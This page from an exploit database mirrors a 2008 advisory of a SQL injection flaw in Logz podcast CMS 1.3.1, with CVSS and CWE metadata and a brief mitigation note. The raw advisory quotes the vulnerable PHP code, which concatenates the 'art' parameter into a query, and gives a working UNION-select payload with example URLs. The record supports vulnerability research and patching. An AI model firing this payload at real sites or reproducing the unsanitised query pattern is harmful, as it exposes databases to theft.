header-logo
Suggest Exploit
vendor:
Logz podcast CMS
by:
ZoRLu
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Logz podcast CMS
Affected Version From: 1.3.2001
Affected Version To: 1.3.2001
Patch Exists: YES
Related CWE: N/A
CPE: a:logz_podcast_cms:logz_podcast_cms:1.3.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Logz podcast CMS version 1.3.1 Remote sql inj

An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable server. The request should contain a malicious SQL query in the ‘art’ parameter. This malicious query will be executed in the backend database, allowing the attacker to gain access to sensitive information such as usernames and passwords.

Mitigation:

The best way to mitigate this vulnerability is to sanitize user input and validate it before passing it to the backend database.
Source

Exploit-DB raw data:

[~] Logz podcast CMS version 1.3.1 Remote sql inj
[~]
[~] download: http://sourceforge.net/project/showfiles.php?group_id=107225&package_id=178479&release_id=635701
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 31.10.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] contact: trt-turk@hotmail.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~] 
[~] N0T: a.q kpss : ) )
[~]
[~] -----------------------------------------------------------

file:

fichiers/add_url.php

code:

       if (isset($_GET['art'])) {
	      $Article = $_GET['art']; 
	      
	      ...
	      
	      $Requete = "SELECT TITRE FROM ".TABLEARTICLES." WHERE ID = '".$Article."' ".$Conditions;
        $ResultRequete = requete_mysql($Requete);
	      
	   

Exploit:

http://localhost/script_path/fichiers/add_url.php?art=[SQL]

[SQL]= column number 1 (SELECT TITRE FROM ...)

1'+union+select+concat(user(),0x3a,database())/*

example:

http://example.com/scripth_path/fichiers/add_url.php?art=1'+union+select+concat(user(),0x3a,database())/*

[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & all Muslim HaCkeRs
[~]
[~] yildirimordulari.org  &  darkc0de.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2008-10-31]

Navigation

Suggest Exploit

Services By CQR